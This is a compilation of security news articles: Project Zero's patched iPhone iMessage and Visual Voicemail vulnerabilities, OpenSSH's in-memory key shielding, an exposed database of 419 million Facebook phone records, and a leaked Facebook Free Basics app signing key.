Security analysts from Google’s Project Zero investigated the remote attack surface of the iPhone and reviewed SMS, MMS, VVM, Email, and iMessage. They found several serious zero-day vulnerabilities in the remote, interaction-less attack surface of the iPhone. The majority of vulnerabilities occurred in iMessage due to its broad and difficult to enumerate attack surface. Visual Voicemail also had a large and unintuitive attack surface that likely led to a single serious vulnerability being reported in it.   Vulnerability in Visual Voicemail Visual Voicemail (VVM) is a feature of mobile devices that allows voicemail to be read in an email-like format. It informs devices of the location of the IMAP server by sending a specially formatted SMS message containing the URL of the IMAP server.  Any device can send a message that causes Visual Voicemail to query an IMAP server specified in the message. So an attacker can force a device to query an IMAP server they control without the user interacting with the device in any way. This results in an object lifetime issue in the iPhone IMAP client. It happens when a NAMESPACE command response contains a namespace that cannot be parsed correctly. It leads to the mailbox separator being freed, but not replaced with a valid object. This leads to a selector being called on an object that is not valid. This vulnerability was assigned id CVE-2019-8613. This issue was fixed on Tuesday, May 14. Vulnerabilities in iMessage CVE-2019-8624: A bug was found in the Digital Touch extension which led to a crash in SpringBoard requiring no user interaction.  This extension allows users to send messages containing drawings and other visual elements. This bug was fixed in Apple’s July 24 update. CVE-2019-8663: This vulnerability was found in deserializing the SGBigUTF8String class, which is a subclass of NSString. The initWithCoder: implementation of this class deserializes a byte array that is then treated as a UTF-8 string with a null terminator, even if it does not have one. This can lead to a string that contains out-of-bounds memory being created. CVE-2019-8661: This vulnerability is present in [NSURL initWithCoder:] and affects Mac only. It results in a heap overflow in [NSURL initWithCoder:] that can be reached via iMessage and likely other paths. It also results in a crash in soagent requiring no user interaction. This issue can be resolved by removing CarbonCore from the NSURL deserialization path. It was fixed on Saturday, Aug 3, 2019. CVE-2019-8646: This vulnerability allows deserializing in the class _NSDataFileBackedFuture even if secure encoding is enabled. Classes do not need to be public or exported to be available for deserialization. This issue was fixed in iOS 12.4 by preventing this class from being decoded unless it is explicitly added to the allow list. Better filtering of the file URL was also implemented. CVE-2019-8647: It occurs when deserializing class _PFArray, which extends NSArray and implements [_PFArray initWithObjects:count:], which is called by[NSArray initWithCoder:]. This vulnerability results in NSArray deserialization invoking a subclass that does not retain references. This issue can be reached remotely via iMessage and crash Springboard with no user interaction. This issue was fixed in 12.4 by implementing [_PFArray classForKeyedUnarchiver] and similar that returns NSArray. CVE-2019-8660. This vulnerability involved cycles in serialized objects. There is a memory corruption vulnerability when decoding an object of class  NSKnownKeysDictionary1. It was fixed in iOS 12.4 with improved length checking. They found another vulnerability CVE-2019-8641, which they are not yet disclosing because its fix did not fully remediate the issue. The analysts concluded that reducing the remote attack surface of the iPhone would likely improve its security. You can read their complete analysis on Project Zero’s blog. Google Project Zero reveals six “interactionless” bugs that can affect iOS via Apple’s iMessage Google Project Zero reveals an iMessage bug that bricks iPhone causing repetitive crash and respawn operations Cloud Next 2019 Tokyo: Google announces new security capabilities for enterprise users

Last week, Damien Miller, a Google security researcher, and one of the popular OpenSSH and OpenBSD developers announced an update to the existing OpenSSH code that can help protect against the side-channel attacks that leak sensitive data from computer’s memory. This protection, Miller says, will protect the private keys residing in the RAM against Spectre, Meltdown, Rowhammer, and the latest RAMBleed attack. SSH private keys can be used by malicious threat actors to connect to remote servers without the need of a password. According to CSO, “The approach used by OpenSSH could be copied by other software projects to protect their own keys and secrets in memory”. However, if the attacker is successful in extracting the data from a computer or server's RAM, they will only obtain an encrypted version of an SSH private key, rather than the cleartext version. In an email to OpenBSD, Miller writes, “this change encrypts private keys when they are not in use with a symmetric key that is derived from a relatively large 'prekey' consisting of random data (currently 16KB)." He further adds, "Attackers must recover the entire prekey with high accuracy before they can attempt to decrypt the shielded private key, but the current generation of attacks have bit error rates that, when applied cumulatively to the entire prekey, make this unlikely”. "Implementation-wise, keys are encrypted 'shielded' when loaded and then automatically and transparently unshielded when used for signatures or when being saved/serialised," Miller said. The OpenSSH dev hope they'll be able to remove this special protection against side-channel attacks "in a few years time when computer architecture has become less unsafe", Miller said at the end of the patch. To know more about this announcement in detail, visit Damien Miller’s email. All Docker versions are now vulnerable to a symlink race attack Telegram faces massive DDoS attack; suspects link to the ongoing Hong Kong protests A second zero-day found in Firefox was used to attack Coinbase employees; fix released in Firefox 67.0.4 and Firefox ESR 60.7.2

Yesterday, TechCrunch reported of an exposed server with more than 419 million records from Facebook phone numbers are discovered online. According to Zack Whittaker, TechCrunch security reporter, the server was not protected with a password and was accessible to anyone. It featured 133 million records from U.S.-based Facebook users, 18 million records from users in the UK, and 50 million records on users in Vietnam. The records contained each person's unique Facebook ID along with the phone number listed on the account. Facebook IDs are unique numbers that can be associated with an account to discover a person's username. TechCrunch was able to verify multiple records in the database by matching a known Facebook user's phone number against a listed Facebook ID. Other records were verified by matching phone numbers with Facebook's password reset feature, which can be used to partially reveal a phone number linked to an account. Records primarily had phone numbers, but in some cases, also had usernames, genders, and country location. "This dataset is old and appears to have information obtained before we made changes last year to remove people's ability to find others using their phone numbers," a Facebook spokesperson said to TechCrunch. "The dataset has been taken down and we have seen no evidence that Facebook accounts were compromised,'' they added. The database was originally discovered by security researcher and a member of GDI Foundation, Sanyam Jain, who was able to locate phone numbers associated with several celebrities as well. It's not clear who owned the database or where it originated from, but it was taken offline after TechCrunch contacted the web host. Phone number security has become increasingly important over the course of the last few years due to SIM-hacking. This technique of hacking involves calling a phone carrier and asking for a SIM transfer for a specific number, thereby giving access to anything linked to that phone number, such as two-factor verification, password reset info, and more. Leaked phone numbers also expose Facebook users to spam calls, which have become more and more prevalent over the last several years. Last week one of the security & privacy researchers, Jane Manchung Wong, in a series of tweets showed a Global Library Collector in the Facebook’s Android App code. According to Wong this GLC allows the mobile app to upload data from user’s device to Facebook servers. The tweet went viral and the general public had their say in it. https://twitter.com/wongmjane/status/1167463054709334017 Most responses received from mobile app developers said that it is a known fact and Android phones upload system libraries to Facebook server to check the app stability. And the libraries do not contain any personal data. However, this report by TechCrunch is the latest security lapse involving Facebook and user’s personal data after a string of data breach incidents since the Cambridge Analytica scandal. On Hacker News, the community expressed their distrust of Facebook’s statements. On user commented, “Facebook: "This dataset is old and appears to have information obtained before we made changes last year to remove people’s ability to find others using their phone numbers." Not that "old." Some of those "update" dates are just a few days ago.” Another user commented, “But the data appeared to be loaded into the exposed database at the end of last month — though that doesn’t necessarily mean the data is new. Somewhat curious what the Status key represents in this dump, personally.” What’s new in security this week? Over 47K Supermicro servers’ BMCs are prone to USBAnywhere, a remote virtual media vulnerability Cryptographic key of Facebook’s Free Basics app has been compromised Retadup, a malicious worm infecting 850k Windows machines, self-destructs in a joint effort by Avast and the French police  

Last week, APK Mirror and Android Police owner Artem Russakovskii reported that a cryptographic key used by Facebook developers to digitally sign its Free Basics by Facebook app has been compromised, and third-party apps are reusing the key. https://twitter.com/ArtemR/status/1159867541537169409 Russakovskii discovered this issue and reported it to Facebook earlier in August. Then Facebook pulled the original app listing from the Play Store and replaced it with a new app using a new signing cryptographic key. Since then, the company has not publicly divulged the nature of the compromised key. They have also not given any precise reason for the re-released app to its users, placing them at risk if they still have the old version installed. Before the listing was removed, the original Free Basics by Facebook app had over five million downloads on the Play Store. Websites like APK Mirror host Android apps for download. They do it for several reasons: to circumvent censorship, so users can download updates before they're widely rolled out, to mitigate geographic restrictions, and to provide a historical archive for comparison and ease of rolling back updates, among other reasons. Russakovskii writes, “In the last month, we've spotted third-party apps using a debug signing cryptographic key which matched the key used by Facebook for its Free Basics Android app.” The APK Mirror team notified Facebook about the leaked key, and the company verified it, pledging to address the issue in a new version of the app. The company claims it has prompted users to upgrade to the newer version of app but did not provide any specific reason for the update. Potential dangers of a compromised cryptographic key According to Android Police, the security of Android app updates hinges on the secrecy of a given app's signing cryptographic key. It's how app updates are verified as secure, and if it falls into the wrong hands, false updates could be distributed containing nefarious changes. As a result, developers usually guard signing keys quite closely. Of course, that security is entirely dependent upon developers keeping their app signing key secret; if it's publicly available, anyone can sign an app that claims to be an update to their app, and consumers' phones will easily install right over the top of the real app. So losing or leaking a signing key is a big problem. If signing keys fall into the wrong hands, third parties can distribute maliciously modified versions of the app as updates on venues outside the Play Store, and potentially trick sites similar to APK Mirror that rely on signature verification. Someone can easily upload a fake app that looks like it was made by Facebook to a forum or trick less wary APK distribution sites into publishing it based on the verified app signature. To make things a bit easier for developers, Google has started a service which allows developers to store app signing keys on its servers instead. The "Google Play App Signing," as it's called, means that app keys can't ever be lost and compromised cryptographic keys can be "upgraded" to new keys. Additionally, Android 9 Pie supports a new "key rotation" feature which securely verifies a lineage of signatures in case you need to change them. Facebook’s lax approach in addressing the security issue According to APK Mirror, the old app is telling users to move to the new version, but no specific statement has been provided to customers. A spokesperson from Facebook said to APK Mirror that users were simply notified of the requirement to upgrade in the old app. And the APK Mirror team is unable to check the old app or the specific message sent to customers, as the Free Basics app doesn't appear to work outside specific markets. Additionally, the new app listing on the Play Store makes no mention that the security of the old app has been compromised by the leaked signing cryptographic key, and the APK Mirror team did not find any disclosure about how this leak has impacted user security anywhere on Facebook's site or the internet.org site. When asked for a statement, Facebook spokesperson provided with the following: “We were notified of a potential security issue that could have tricked people into installing a malicious update to their Free Basics app for Android if they chose to use untrusted sources. We have seen no evidence of abuse and have fixed the issue in the latest release of the app.” What’s new in the security this week? Retadup, a malicious worm infecting 850k Windows machines, self-destructs in a joint effort by Avast and the French police A security issue in the net/http library of the Go language affects all versions and all components of Kubernetes GitHub now supports two-factor authentication with security keys using the WebAuthn API